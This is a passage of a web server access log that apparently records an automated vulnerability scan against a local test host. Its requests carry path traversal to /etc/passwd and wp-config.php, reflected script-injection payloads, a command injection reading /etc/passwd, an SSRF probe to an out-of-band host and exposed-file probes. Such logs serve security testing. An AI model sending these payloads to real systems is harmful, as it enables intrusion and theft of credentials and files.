+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229KD1wqWlpvp5mWRj7pROxPN723.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_darcs/prefs/binaries HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/GetDocLink.ashx?link=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"url=https://127.0.0.1:443@ca28fg0smpvbd3qg07h0ffi5g8sanqa4b.oast.live\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /plugins/servlet/gadgets/makeRequest HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29KD1wqWlpvp5mWRj7pROxPN723.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bzr/branch/branch.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v3/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/whoami HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like 